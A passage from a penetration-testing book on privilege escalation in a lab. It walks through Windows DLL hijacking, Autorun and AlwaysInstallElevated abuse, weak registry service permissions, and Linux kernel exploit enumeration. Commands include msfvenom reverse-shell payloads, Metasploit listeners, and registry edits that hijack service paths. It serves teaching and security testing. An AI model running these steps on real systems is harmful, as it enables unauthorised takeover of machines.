The first step in the exploitation phase involves identifying the application or services with missing DLLs. This can be done through the winPEAS enumeration tool that we used in Chapter 4, Performing Local Enumeration, of this book.

The winPEAS binary can be downloaded from the GitHub repository here: https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS/winPEASexe.

Ensure you download the correct binary based on the architecture of your target operating system; the architecture-specific binaries can be found in the binaries folder, as highlighted in the following screenshot:

Figure 8.25 – winPEAS binaries

After downloading the binary to our Kali virtual machine, we need to transfer the winPEAS.exe binary to our target virtual machine.

We can transfer the winPEAS.exe binary to the target system with Meterpreter by running the following command:

upload /<PATH-To-BINARY>/winPEASx64.exe

In the event you are using a standard command shell, you can use the certutil utility to transfer the binary to the target system.

After uploading the winPEAS.exe binary to the target system, we can enumerate a list of services that have missing DLLs by running the following command:

.\winPEASx64.exe servicesinfo

As highlighted in the following screenshot, this will enumerate a list of services with missing DLLs and their respective paths. In our case, we are able to identify the application path for the dllsvc service that has the necessary permissions:

Figure 8.26 – winPEAS DLL hijacking paths

We are also able to identify the vulnerable DLL hijacking service as illustrated in the following screenshot:

Figure 8.27 – winPEAS DLL hijacking services

We can also identify missing DLLs for dllhijackservice.exe manually. This can be done through the Process Monitor utility, which can be downloaded here: https://docs.microsoft.com/en-us/sysinternals/downloads/procmon.
After downloading the Process Monitor executable to the target system, we can execute it and set the filter options highlighted in the following screenshot:

Figure 8.28 – Process Monitor result filter

After setting the result filter with a value of NAME NOT FOUND, we need to set up an additional path filter to only display .dll files, as highlighted in the following screenshot:

Figure 8.29 – Process Monitor path filter

After adding both filters, your filter configuration should be similar to the configuration in the following screenshot:

Figure 8.30 – Process Monitor Filter

After you have set up the filters, you can apply them by clicking on the Apply button, as highlighted in the preceding screenshot.

These filters will only display services with missing DLLs and their respective DLL names. In this case, we are able to identify the vulnerable service and the missing DLL names with their respective paths, as highlighted in the following screenshot:

Figure 8.31 – Process Monitor missing DLLs

We can now generate our custom DLL that will provide us with a Meterpreter session when executed.

We can generate the custom DLL with msfvenom and use the Meterpreter payload by running the following command in Kali:

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<KALI-IP> LPORT=PORT -f dll > hijackme.dll

We will save the custom DLL file with the name of the missing DLL for the dllhijackservice.exe service. In our case, we will hijack the hijackme.dll DLL.

After generating the custom DLL, we can transfer it to the target system under the respective service path. In our case, the path will be the following:

C:\Windows\System32\wbem

We can upload the custom DLL with Meterpreter by running the following command:

upload /PATH-TO-DLL/hijackme.dll

As highlighted in the following screenshot, the hijackme.dll file should be uploaded to the correct path:

Figure 8.32 – Uploading the custom DLL

We now need to set up the Meterpreter listener with Metasploit. This can be done by running the following command in the Metasploit console:

use /exploit/multi/handler

The next step involves specifying the payload we used to create the binary with msfvenom. This can be done by running the following command:

set payload /windows/x64/meterpreter/reverse_tcp

We now need to configure the module options. In this case, we need to configure the LHOST and LPORT options as highlighted in the following screenshot:

Figure 8.33 – Meterpreter listener options

After setting the module options, we can start the listener by running the following command:

run

The listener will listen for any incoming connections from the payload we generated with msfvenom.

In order to execute the custom DLL, we need to restart the dllsvc service. This can be done by running the following commands in the Windows command shell:

sc stop dllsvc

sc start dllsvc

If you havefollowed the steps highlighted so far correctly, you should receive a Meterpreter session on the listener we had set up, as follows:

Figure 8.34 – DLL hijack Meterpreter

We can verify that we have an elevated Meterpreter session by running the following command:

getuid

As highlighted in the following screenshot, we have successfully elevated our privileges and should have a Meterpreter session with administrative privileges:

Figure 8.35 – getuid Meterpreter

We have been able to elevate our privileges by identifying missing DLLs and generating a custom DLL that will be executed to provide us with an elevated Meterpreter session.

Summary

In this chapter, we got started with understanding how to identify and exploit unquoted service paths and how they can be utilized to execute a malicious binary in order to elevate our privileges. We also explored the process of exploiting the Windows secondary logon both manually and automatically with the Metasploit framework. We then took a look at how to identify and exploit weak service permissions and ended the chapter by taking an in-depth look at how to identify missing DLLs and the process of performing DLL hijacking.

In the next chapter, we will explore the process of privilege escalation through the Windows Registry.

===== FILE 15/21: B17389_09_Final_PG_ePub.xhtml =====

Chapter 9: Privilege Escalation through the Windows Registry

You should now have a good grasp of how to identify and perform some of the most important privilege escalation techniques on Windows. However, one final piece of this puzzle remains: the Windows Registry. In this chapter, we will look at how to elevate privileges on the target system by leveraging misconfigurations and weaknesses in the Windows Registry.

We will explore the process of identifying misconfigurations in the registry, utilizing the Autorun functionality, exploiting weak registry permissions, and the AlwaysInstallElevated feature to elevate our privileges. We will also provide a brief overview of the Windows Registry to understand its purpose and functionality.

In this chapter, we're going to cover the following main topics:

Understanding the Windows Registry
Exploiting Autorun programs
Exploiting the AlwaysInstallElevated feature
Exploiting weak registry permissions
Technical requirements

To follow along with the demonstrations in this chapter, you will need to ensure that you meet the following technical requirements:

Familiarity with Windows CMD commands
Familiarity with the Windows Registry

You can view this chapter's code in action here: https://bit.ly/3oga2ji

Understanding the Windows Registry

Before we can dig into the meat and potatoes of this chapter, we must have a functional understanding of the Windows Registry, what it is used for, and how it works.

This information will prove useful in the latter sections of this chapter and will provide a much better context of what we are doing, as well as what we want to achieve, when we utilize various privilege escalation techniques.

What is the Windows Registry?

Simply put, the Windows Registry is a hierarchical database that is responsible for storing configurations, settings, and values for applications, hardware, and the Windows operating system. In the context of programs and applications, the registry is also used to store program and application data relevant to the configuration and operation of the program.

Given the centralized nature of the Windows Registry and the data it stores, it is a prime target for penetration testers during the privilege escalation process. This is because it can reveal information about the operating system's configuration and the configuration of the programs that have been installed on the target system. These configurations can reveal potential weaknesses in various Windows services, such as the Autorun feature.

In Chapter 4, Performing Local Enumeration, we explored various enumeration techniques that can be used to exfiltrate important and useful data from the registry primarily pertaining to application passwords. However, we did not explore the process of enumerating important operating system configurations that can be used to exploit services and other Windows features.

In this chapter, we will be exploring the process of identifying these operating system misconfigurations in the Windows Registry and how they can be leveraged to elevate our privileges.

Note

Note that programs and applications are not required to store configurations in the Windows Registry and may opt to store them within the program installation directory. You must keep this in mind when searching for misconfigurations and vulnerabilities in programs and applications.

We can access the Windows Registry on a Windows system by running the regedit.exe executable. This can be done through the Windows Command Prompt or the Run utility, as highlighted in the following screenshot:

Figure 9.1 – Launching regedit.exe

Note

The Windows Registry Editor (regedit.exe), is a built-in Windows executable that is used to interact with the Windows Registry and allows users to view and edit registry entries.

As shown in the following screenshot, the Windows Registry uses a hierarchical sorting system that categorizes data as keys and values based on its functionality and purpose:

Figure 9.2 – Registry Editor

The Windows Registry Editor displays various keys that contain their respective values. Now, let's take a look at how these keys and values are stored and categorized.

How the Windows Registry stores data

The Windows Registry operates under a key/value system, where entries store their data in the form of a key and data pair.

To understand how keys and values work in the context of the Windows Registry, we can use the categorization analogy of folders and files, where keys are folders and values are files.

The Windows Registry Editor displays a categorized list of root keys that contain all the registry values on the system. The following table provides a description of each root key, its abbreviation, and the nature of the respective values it stores:

Now that you understand how the Windows Registry stores data, the various root keys, and the type of information they store, we can begin exploring the process of identifying operating misconfigurations in the Windows Registry.

This process is dynamic and, as a result, will depend on the target configuration and deployment use case, primarily because the techniques involved in this process will depend on the implementation and configuration of particular services.

Given the robust nature of this process and the techniques used, we will be utilizing the Windows 7 virtual machine that we configured in Chapter 8, Exploiting Services. This has been configured with vulnerable services and configurations.

Before we begin, ensure that you have a foothold on the target system and have access to it through a command shell or Meterpreter session.

The techniques and tools used in this chapter will involve utilizing native Windows commands and specific Meterpreter modules to automate various aspects of the process.

We will begin by looking at how to identify and exploit Autorun programs in order to elevate our privileges.

Exploiting Autorun programs

Autorun is a Windows feature that is used to automatically start applications and programs during system startup.

Autorun is a companion feature to AutoPlay that is typically used to automate the startup of setup files for specific programs. This helps streamline the installation of new software when the installation media is inserted into the system.

Programs and software can be configured to run on system startup with the Autorun feature.

The Autorun feature is disabled by default in newer versions of Windows such as Windows 10; however, Microsoft has provided users with the ability to enable it. This technique will require the Autorun feature to be enabled on the target.

We can elevate our privileges through Autorun by identifying programs that have been configured to run on system startup, as well as those that can be run by users with administrative privileges. We can then use these to elevate our privileges.

This process can be performed completing the following steps:

The first step in this process involves identifying Autorun applications on the target system. This can be done by running the following command in the Windows command shell:

reg query HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run

As highlighted in the following screenshot, this will display a list of Autorun applications:

Figure 9.3 – Windows Registry Autorun programs

We can also identify applications that have been configured for Autorun and their respective permissions by using the accesschk utility. The accesschk executable can be downloaded from here: https://docs.microsoft.com/en-us/sysinternals/downloads/accesschk.

After downloading the accesschk executable to our Kali virtual machine, we will need to transfer it to the target system. This can be done through Meterpreter by running the following command:

upload /<PATH-TO-EXECUTABLE/accesschk64.exe

If you are using a standard command shell, you can use the certutil utility to transfer the binary to the target system.

After uploading the accesschk.exe binary to the target system, we can enumerate a list of all Autoruns programs by running the following command in the Windows command shell:

.\accesschk64.exe -wvu "c:\Program Files\ Autorun Program"

As highlighted in the following screenshot, this will highlight a list of Autorun programs, their access permissions, and their respective directories:

Note

RW indicates that the groups have read and write permissions and, as a result, can make changes to the contents of the program directory.

Figure 9.4 – accesschk Autorun programs

As highlighted in the preceding screenshot, we identified the program.exe exactable and its permissions. In this case, the executable has NT AUTHORITY \SYSTEM access permissions. We can utilize this program to elevate our privileges by replacing the program executable with a Meterpreter shell executable that will be automatically executed when the administrator logs in, providing us with an elevated Meterpreter session.

The next step will involve generating the reverse shell executable and uploading it to the target system.

Note

This privilege escalation technique requires the administrator to log on to the system for the Autorun program to be executed.

We can generate the Meterpreter payload with msfvenom and save it as an executable. This can be done by running the following command in Kali:

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<LISTENER-IP> LPORT=<PORT> -f exe > /home/kali/Desktop/program.exe

Note

The reverse shell payload should have the same name of the program we are trying to exploit, and it should be uploaded to the respective service path we identified earlier and highlighted here.

After generating the payload, we can upload it to the target Autorun application path, which is as follows:

C:\Program Files\Autorun Program\

Before we can upload the Meterpreter payload, we need to rename the original binary. However, it is recommended to take a backup of the original binary in the event the process does not work as expected. The original executable can be renamed by running the following command in the Meterpreter session:

mv program.exe program_backup.exe

Now, we can upload the Meterpreter executable to the target Autorun program directory on the target using Meterpreter by running the following command:

upload /home/kali/Desktop/program.exe

If you are using a standard command shell, you can use the certutil utility to transfer the binary to the target system.

As highlighted in the following screenshot, this will upload the Meterpreter executable to the Autorun Program directory:

Figure 9.5 – Uploading a custom Autorun program

Now, we need to set up the Meterpreter listener with Metasploit. This can be done by running the following command in the Metasploit console:

use /exploit/multi/handler

The next step involves specifying the payload we used to create the binary with MSFvenom. This can be done by running the following command:

set payload /windows/x64/meterpreter/reverse_tcp

Now, we need to configure the module options. In this case, we need to configure the LHOST and LPORT options, as highlighted in the following screenshot:

Figure 9.6 – Meterpreter payload options

After setting the module options, we can start the listener by running the following command:

run

The listener will listen for any incoming connections from the payload we generated with MSFvenom.

Our custom Autorun program will be executed automatically the next time the administrator logs in, after which we should receive a privileged Meterpreter session, as highlighted in the following screenshot:

Figure 9.7 – Autorun Meterpreter session

With that, we have successfully elevated our privileges by leveraging an Autorun program with misconfigured permissions.

Exploiting the Always Install Elevated feature

AlwaysInstallElevated is a Windows feature that allows standard user accounts with no administrative privileges to install software packaged in the Microsoft Windows Installer (MSI) format with administrative privileges.

We can leverage this configuration to elevate our privileges by generating a custom executable with the MSI format. Then, we can utilize the msiexec utility to execute the MSI executable, which will give us an elevated session.

This feature is commonly misconfigured in companies and organizations, primarily for ease of access for employees or is mistakenly left enabled by administrators after setting up a workstation. Either way, this technique will allow us to elevate our privileges in a relatively straightforward manner.

The Always Install Elevated feature is configured in the Windows Registry and as a result, we can query the registry to determine whether the feature is enabled before we begin the privilege escalation process.

Let's look at how to perform this technique both manually and automatically with the Metasploit framework.

Note

If this feature is not enabled on the target system, this technique will not work.

To perform this technique, follow these steps:

The first step involves identifying whether the AlwaysInstallElevated feature is enabled on the target system. This can be done by running the following registry queries in the Windows command shell:

reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

As highlighted in the following screenshot, this will output the registry configuration for the AlwaysInstallElevated feature and its value. If the highlighted value in the following screenshot is set to 0, the feature is disabled, while if the value is set to 1, the feature is enabled:

Figure 9.8 – Registry query – AlwaysInstallElevated

In this case, we determined that the AlwaysInstallElevated feature is enabled and can therefore be leveraged to elevate our privileges.

The second step in the process will involve generating the custom MSI executable with MSFvenom. This can be done by running the following command in Kali:

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<KALI-IP> LPORT=<PORT> -f msi > setup.msi

After generating the payload, we can upload it to the Windows temporary directory, which can be found here:

C:\Temp

Now, we can upload the custom MSI executable to the temporary directory on the target using Meterpreter by running the following command:

upload /home/kali/Desktop/setup.msi

If you are using a standard command shell, you can use the certutil utility to transfer the binary to the target system.

As shown in the following screenshot, this will upload the Meterpreter executable to the Autorun Program directory:

Figure 9.9 – Meterpreter – upload custom MSI

Now, we need to set up the Meterpreter listener with Metasploit. This can be done by running the following command in the Metasploit console:

use /exploit/multi/handler

The next step involves specifying the payload we used to create the custom MSI executable with MSFvenom. This can be done by running the following command:

set payload /windows/x64/meterpreter/reverse_tcp

Now, we need to configure the module options. In this case, we need to configure the LHOST and LPORT options, as highlighted in the following screenshot:

Figure 9.10 – Meterpreter payload options

After setting the module options, we can start the listener by running the following command:

run

The listener will listen for any incoming connections from the custom MSI executable we generated with MSFvenom.

The next step involves executing the custom MSI executable with the msiexec utility. This can be done by running the following command in the Windows command shell:

msiexec /quiet /qn /i C:/temp/setup.msi

If successful, this will spawn an elevated Meterpreter session on our listener, as highlighted in the following screenshot:

Figure 9.11 – AlwaysInstallElevated Meterpreter session

This process will also add the current standard user to the local administrators' group. We can confirm this by running the following command in the Windows command shell:

net localgroup administrators

As highlighted in the following screenshot, the Win7 user has been added to the local administrators' group and has administrative privileges:

Figure 9.12 – Local administrators group members

With that, we successfully elevated our privileges by leveraging the AlwaysInstallElevated feature manually.

We can also automate the process by using a Metasploit module:

Load the module by running the following command:

use exploit/windows/local/always_install_elevated

After loading the module, you will need to set the SESSION option for the module. The SESSION option requires the session ID of your Meterpreter session. This can be done by running the following command:

set SESSION <SESSION-ID>

As illustrated in the following screenshot, the SESSION option should reflect the session ID you set:

Figure 9.13 – Metasploit module options

After configuring the module options, we can run the module by running the following command:

run

If the exploit is successful, you should get a new elevated Meterpreter session, as highlighted in following screenshot:

Figure 9.14 – Elevated Meterpreter session

With that, we successfully elevated our privileges by leveraging the AlwaysInstallElevated feature on Windows both manually and automatically with Metasploit.

Exploiting weak registry permissions

This privilege escalation technique involves identifying and modifying the registry values of a service with a standard user account. In many cases, writing or modifying values in the Windows Registry is limited to administrators. However, you may come across services that can be modified by standard user accounts.

We can leverage this vulnerability to modify the ImagePath (the application path) of a service with the path of a custom executable. This will give us an elevated session when the service is restarted.

This technique will only work on systems that have at least one or more services with weak permissions.

The exploitation process can be performed by following these steps:

The first step in this process involves identifying a list of services whose registry values can be modified. In this case, we can use the winPEAS enumeration tool to enumerate a list of services with registry values and their respective permissions.

The winPEAS binary can be downloaded from the following GitHub repository: https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS/winPEASexe.

Ensure you download the correct binary based on the architecture of your target operating system; the architecture-specific binaries can be found in the binaries folder, as highlighted in the following screenshot:

Figure 9.15 – winPEAS binaries

After downloading the binary to our Kali VM, we need to transfer the winPEAS.exe binary to our target virtual machine.

We can transfer the winPEAS.exe binary to the target system with Meterpreter by running the following command:

upload /<PATH-To-BINARY>/winPEASx64.exe

If you are using a standard command shell, you can use the certutil utility to transfer the binary to the target system.

After uploading the winPEAS.exe binary to the target system, you can enumerate a list of service registry values by running the following command:

.\winPEASx64.exe servicesinfo

As shown in the following screenshot, this will enumerate a list of service registry values that can be modified. In our case, we can identify the regsvc service, which has the required permissions:

Figure 9.16 – winPEAS insecure registry service

In this case, we can modify the service and modify the ImagePath with the path to our own Meterpreter executable.

The second step in the process will involve generating the custom Meterpreter executable with MSFvenom. This can be done by running the following command in Kali:

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<KALI-IP> LPORT=<PORT> -f exe > shell.exe

After generating the executable, we can upload it to the Windows temporary directory, which can be found here:

C:\Temp

Now, we can upload the custom executable to the temporary directory on the target using Meterpreter by running the following command:

upload /home/kali/Desktop/shell.exe

If you are using a standard command shell, you can use the certutil utility to transfer the binary to the target system.

As shown in the following screenshot, this will upload the Meterpreter executable to the temporary directory:

Figure 9.17 – Meterpreter – upload custom executable

Now, we need to set up the Meterpreter listener with Metasploit. This can be done by running the following command in the Metasploit console:

use /exploit/multi/handler

The next step involves specifying the payload we used to create the custom executable with MSFvenom. This can be done by running the following command:

set payload /windows/x64/meterpreter/reverse_tcp

Now, we need to configure the module options. In this case, we need to configure the LHOST and LPORT options, as highlighted in the following screenshot:

Figure 9.18 – Meterpreter payload options

After setting the module options, we can start the listener by running the following command:

run

The listener will listen for any incoming connections from the custom executable we generated with MSFvenom.

Now, we can modify the ImagePath value for the target registry service and set it as the path of the custom executable we generated. This can be done by running the following command in the Windows command shell on the target:

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\regsvc" /t REG_EXPAND_SZ /v ImagePath /d "C:\Temp\shell.exe" /f

If successful, the new value should be written. Now the service will execute our custom executable the next time it is started or restarted.

We can start the service by running the following command in the Windows command shell:

sc start regsvc

The service will now execute our custom executable and provide us with an elevated Meterpreter session on the listener we set up, as highlighted in the following screenshot:

Figure 9.19 – Elevated Meterpreter session

You should now have a good grasp of how to identify misconfigurations in the Windows Registry, as well as how to leverage them to elevate your privileges on a target system.

Summary

In this chapter, we understood how the Windows Registry works and how it stores data. Then, we explored the process of identifying and exploiting the Autorun feature on Windows to elevate our privileges. We also explored the process of leveraging the AlwaysInstallElevated feature on Windows to elevate our privileges, both manually and automatically, with Metasploit. Finally, we looked at how to exploit weak registry service permissions.

In the next chapter, we will begin the privilege escalation process on Linux by exploring the process of identifying and utilizing kernel exploits.

===== FILE 16/21: B17389_Section3_Final_PG_ePub.xhtml =====

Section 3: Linux Privilege Escalation

This section will cover the privilege escalation process on Linux. You will be able to elevate your privileges on the target system through the use of multiple privilege escalation attack vectors, tools, and techniques.

The following chapters are included in this section:

Chapter 10, Linux Kernel Exploits
Chapter 11, Linux Password Mining
Chapter 12, Scheduled Tasks
Chapter 13, Exploiting SUID Binaries

===== FILE 17/21: B17389_10_Final_PG_ePub.xhtml =====

Chapter 10: Linux Kernel Exploits

Now that you have a functional understanding of how to elevate your privileges on Windows systems, we can begin exploring the process of elevating our privileges on Linux systems. The first privilege escalation attack vector we will be exploring in this chapter is kernel exploitation.

In this chapter, you will learn how to identify, transfer, and utilize kernel exploits on Linux both manually and automatically. This process will mirror the same methodology we used in Chapter 5, Windows Kernel Exploits, where we explored the kernel exploitation process on Windows.

We will start by taking a look at how the Linux kernel works and how to identify kernel vulnerabilities on Linux by using local enumeration scripts. After this, we will explore the process of modifying, compiling, and transferring kernel exploits to the target system.

In this chapter, we're going to cover the following main topics:

Understanding the Linux kernel
Kernel exploitation with Metasploit
Manual kernel exploitation
Technical requirements

To follow along with the demonstrations in this chapter, you will need to ensure that you have familiarity with Linux Terminal commands.

You can view this chapter's code in action here: https://bit.ly/3igFnys

Understanding the Linux kernel

You should already have a good idea of how a kernel works as we took an in-depth look at the structure, purpose, and functionality of a kernel in Chapter 5, Windows Kernel Exploits. As a result, we will only be focusing on the structure of the Linux kernel and how it works in this chapter.

The Linux kernel is a Unix-like open source, monolithic, and modular operating system kernel that was created in 1991 by Linus Torvalds, and was later implemented as the primary kernel for the GNU operating system. This combination of the Linux kernel and the GNU toolchain has led to the development of a plethora of operating systems that use the Linux kernel. These are commonly referred to as Linux distributions. A Linux distribution is an operating system that utilizes the Linux kernel and pairs it with various tools and utilities to cater to a particular use case or industry.

Similar to Windows NT, the Linux kernel consists of two main modes of operation that determine access to system resources and hardware:

User space: User space is a sector of unprivileged segregated memory that's reserved for user programs and services that run outside the operating system kernel. By default, the services are segregated from the kernel and, as a result, will have limited privileges.
Kernel space: The kernel space is a privileged sector of segregated memory that's reserved for running the kernel. The kernel space is privileged, given the nature of the processes and functionality the kernel is responsible for handling.

As illustrated in the following diagram, the two main modes of operation are used to segregate access to resources and hardware:

Figure 10.1 – Linux kernel structure

User space applications and services can communicate with the kernel space through the use of system calls, as illustrated in the preceding diagram. The interaction between the user space and kernel space is facilitated through the GNU C library and, consequently, the system call interface.

The system call interface is responsible for handling system calls from user space into the kernel.

The kernel space has full access to the system's hardware and resources and is responsible for managing system services and system calls from the user space.

Understanding the Linux kernel exploitation process

The Linux kernel is vulnerable to various attacks that can lead to exploitation or privilege escalation. In this chapter, we will primarily be focusing on how to correctly identify and exploit vulnerabilities in the Linux kernel to elevate our privileges.

Given the fact that the kernel runs in the privileged kernel space, any vulnerability in the kernel that allows arbitrary code to be executed will run in a privileged state and, as a result, provide us with an elevated session.

This process will follow a two-pronged approach that will encompass the process of utilizing kernel exploits both manually and automatically.

Kernel exploits on Linux will typically target vulnerabilities in the Linux kernel to execute arbitrary code. This will help with running privileged system commands or obtaining a system shell. This process will differ based on the version of the Linux kernel being targeted and the kernel exploit being used.

In this chapter, we will need to set up an Ubuntu 16.04 target virtual machine in our virtual hacking lab.

We can begin the kernel exploitation process with the Metasploit framework, which will allow us to automate the process of identifying and exploiting kernel vulnerabilities on Windows.

Setting up our environment

In this chapter, we will be utilizing a customized Ubuntu 16.04 virtual machine that has been configured to be vulnerable. This will provide us with a robust environment to learn about and demonstrate kernel exploitation.

To start setting up the virtual machine, follow these steps:

The first step in this process involves downloading the virtual machine files required to set up the target system with VirtualBox. The necessary file can be downloaded from https://download.vulnhub.com/stapler/Stapler.zip.
After downloading the ZIP file, you will need to extract its contents. You should be presented with a folder that contains the open virtualization format (OVF) and virtual machine disk (VMDK) files, which are required to run the virtual machine, as highlighted in the following screenshot:

Figure 10.2 – Virtual machine files

To import the virtual machine into VirtualBox, you will need to double-click the Stapler.ovf file. You will be prompted with the VirtualBox import wizard, as illustrated in the following screenshot:

Figure 10.3 – VirtualBox import wizard

The VirtualBox import wizard will prompt you to specify the virtual machine base folder, as highlighted in the preceding screenshot. After doing this, you can click on the Import button to begin the import process.

Once the virtual machine has been imported into VirtualBox, you will need to add it to the Virtual Hacking Lab network we created in Chapter 2, Setting Up Our Lab, as highlighted in the following screenshot:

Figure 10.4 – VirtualBox network settings

Once you have configured the virtual machine to use the custom network, you can save the changes and boot up the VM to get started.

Note

You will require an initial foothold on the system to follow along with the techniques and demonstrations in this chapter. The following exploitation guide highlights the process of retrieving a meterpreter session on the target VM: https://download.vulnhub.com/stapler/slides.pdf.

Now that we have set up our environment and target virtual machine, we can begin the privilege escalation process with Metasploit.

Kernel exploitation with Metasploit

We can begin the kernel exploitation process by taking a look at how to use kernel exploits with the Metasploit framework. The Metasploit framework offers an automated and modularized solution and streamlines the exploitation process.

For this section, our target system will be the Ubuntu 16.04 virtual machine. As a prerequisite, ensure that you have gained your initial foothold on the system and have a meterpreter session:

The first step involves scanning the target for potential exploits. For this, we will be using the local_exploit_suggester module. This process was covered in depth in the previous chapter.
We can load the module in Metasploit by running the following command:

use post/multi/recon/local_exploit_suggester

After loading the module, you will need to set the SESSION option for the module. The SESSION option requires the session ID of your meterpreter session. This can be done by running the following command:

set SESSION <SESSION-ID>

As illustrated in the following screenshot, the SESSION option should reflect the session ID you set:

Figure 10.5 – local_exploit_suggester options

After configuring the module options, we can run the module by running the following command:

run

This will begin the scanning process, during which the module will begin to output the various exploits that the target is potentially vulnerable to, as highlighted in the following screenshot:

Figure 10.6 – local_exploit_suggester results

Now, we can begin testing the various exploit modules recommended by local_exploit_suggester. The first few modules in the output usually have a higher chance of working successfully. We can test the second module in the list, as highlighted in the preceding screenshot, by loading the module. This can be done by running the following command:

use /exploit/linux/local/netfilter_priv_esc_ipv4

This kernel exploit will exploit a netfilter bug on Linux kernels before version 4.6.3 and requires iptables to be enabled and loaded. The exploit also requires libc6-dev-i386 for compiling the exploit. More information regarding this exploit can be found here: https://www.rapid7.com/db/modules/exploit/linux/local/netfilter_priv_esc_ipv4/.

After loading the module, you will need to set the module options, which will include the meterpreter session ID and the payload options for the new meterpreter session, as highlighted in the following screenshot:

Figure 10.7 – Kernel exploit module options

We can now run the kernel exploit module by running the following command:

exploit

In this case, the exploit was unsuccessful because libc6-dev-i386 is not installed, as seen in the following screenshot:

Figure 10.8 – Metasploit kernel exploit failed

Alternatively, running the other kernel exploits suggested by local_exploit_suggester will fail. This is an important lesson to learn: you cannot always rely on using automated Metasploit modules to gain access or elevate your privileges on the target system. Trial and error is a big part of the privilege escalation process.

Given that this path has not yielded any results, we will need to take a more manual hands-on approach in identifying the correct kernel exploit to use. Let's begin by taking a look at how to enumerate relevant information from the target system with various enumeration scripts.

Manual kernel exploitation

In some cases, you will not be successful in using Metasploit modules to elevate your privileges, you may not have access to a target with a meterpreter session, or you may have exploited the target through a manual exploitation technique such as a web shell. In that case, you will have access through a standard reverse shell, most likely facilitated through netcat. This poses a few issues; how can you scan the target for potential kernel exploits? And how can you transfer over the kernel exploit to the target?

These are the issues we will be addressing in this section; our target of choice will be the Ubuntu 16.04 virtual machine we set up earlier in this chapter.

Local enumeration tools

The first step is to scan and identify potential kernel vulnerabilities. This can be done by using linux-exploit-suggester or other enumeration scripts and tools. In this case, we will utilize the linPEAS script to enumerate information from our target.

Note

linPEAS is a local Linux enumeration script that searches and scans for potential vulnerabilities, and then enumerates all important system information that can be used to stage a privilege escalation attack.

The linPEAS binary can be downloaded from the following GitHub repository: https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS.

Ensure you download the linpeas Bash script, as highlighted in the following screenshot:

Figure 10.9 – linPEAS Bash script

After downloading the Bash script to our Kali VM, we need to transfer the linpeas.sh file to our target virtual machine. This cannot be done automatically as we do not have a meterpreter session. As a result, we will need to make use of Linux-specific utilities to download the binary.

Transferring files

To transfer the linpeas.sh file to our target, we will need to set up a web server on our Kali VM. This will be used to host the file so that we can download it on the target system. This can be done by following these steps:

To set up a web server on our Kali VM, we can utilize the SimpleHTTPServer Python module to serve the binary file. This can be done by running the following command in the directory where the linpeas.sh binary is stored:

sudo python -m SimpleHTTPServer 80

Note

You can also use any other open port on your system if port 80 is being used.

Alternatively, you can utilize the Python 3 http.server module by running the following command:

sudo python3 -m http.server 80

As highlighted in the following screenshot, SimpleHTTPServer will serve the files in the directory on the Kali VM IP address on port 80:

Figure 10.10 – SimpleHTTPServer linpeas.sh

To download the linpeas.sh file on to the target system, we can utilize the wget utility. Before we can download the binary, however, we need to navigate to a directory where we have read and write permissions. In this case, we will navigate to the temporary directory, as illustrated in the following screenshot:

Figure 10.11 – Linux temp directory

We can now use the wget utility to download the file from the Kali VM onto our target system. This can be done by running the following command on the target system:

wget http://<KALI-VM-IP>/linpeas.sh

The output of the preceding command can be seen in the following screenshot:

Figure 10.12 – wget successful transfer

As shown in the preceding screenshot, if the transfer is successful, the linpeas.sh file should be downloaded and saved with the name we specified.

We can now use the linpeas.sh script to enumerate important system information that we can use to elevate our privileges.

Enumerating system information

The linpeas.sh script enumerates a lot of information and will perform various checks to discover potential vulnerabilities on the target system. However, it does not enumerate a list of potential kernel exploits. In the context of kernel exploits, we can use the linpeas.sh script to enumerate system information such as the kernel version. This can be done by going through the following steps:

To enumerate all the important system information, we need to run the linpeas.sh script. However, before we do that, we need to ensure the script has executable permissions. This can be done by running the following command on the target:

chmod +x linpeas.sh

We can now run the linpeas.sh script by running the following command on the target:

./linpeas.sh -o SysI

The SysI option is used to restrict the results of the script to only system information. This is primarily because the linpeas.sh script will generate a lot of output.

As shown in the following screenshot, the script will enumerate system information, the kernel version that's been installed, and the Linux distribution release version, as well as the codename:

Figure 10.13 – linPEAS system information

In this case, our target is running Ubuntu 16.04 LTS with kernel version 4.4.0-21 running. We can use this information to identify specific vulnerabilities that affect this version of the kernel. The distribution ID, release version, and codename are also important as some kernel exploits are designed to be run on specific Linux distributions.

The linPEAS script does not provide us with any potential kernel exploits that can be used to elevate our privileges. As a result, we will have to utilize other enumeration scripts.

Note

The linPEAS script enumerates a lot of useful information that will be very useful in the later stages of this book as we delve into other Linux privilege escalation techniques.

Enumerating kernel exploits

We can utilize linux-exploit-suggester to enumerate our system information and scan for potential kernel exploits. The linux-exploit-suggester script can be downloaded from https://github.com/mzet-/linux-exploit-suggester.

It is recommended that you download the script and rename it with a simpler filename. This can be automated by running the following command:

wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh -O les.sh

After downloading the script, we will need to transfer it over to the target system. This can be done by following these steps:

To set up a web server on our Kali VM, we can utilize the SimpleHTTPServer Python module to serve the binary file. This can be done by running the following command in the directory where the les.sh script is stored:

sudo python -m SimpleHTTPServer 80

To download the les.sh script on the target system, we can utilize the wget utility. Before we can download the binary, however, we need to navigate to a directory where we have read and write permissions. In this case, we will navigate to the temporary directory, as illustrated in the following screenshot:

Figure 10.14 – Linux temp directory

We can now use the wget utility to download the file from the Kali VM to our target system. This can be done by running the following command on the target system:

wget http://<KALI-VM-IP>/les.sh

The output is shown in the following screenshot:

Figure 10.15 – wget successful transfer

As shown in the preceding screenshot, if the transfer is successful, the les.sh script should be downloaded and saved with the name we specified.

We can now use the les.sh script to enumerate potential kernel vulnerabilities that we can use to elevate our privileges. This can be done by running the following command on the target system:

./les.sh

As outlined in the following screenshot, the script will enumerate all potential kernel exploits that can be used to elevate privileges. We can now use this information to determine the correct kernel exploit to use:

Figure 10.16 – Linux exploit suggester – kernel exploits

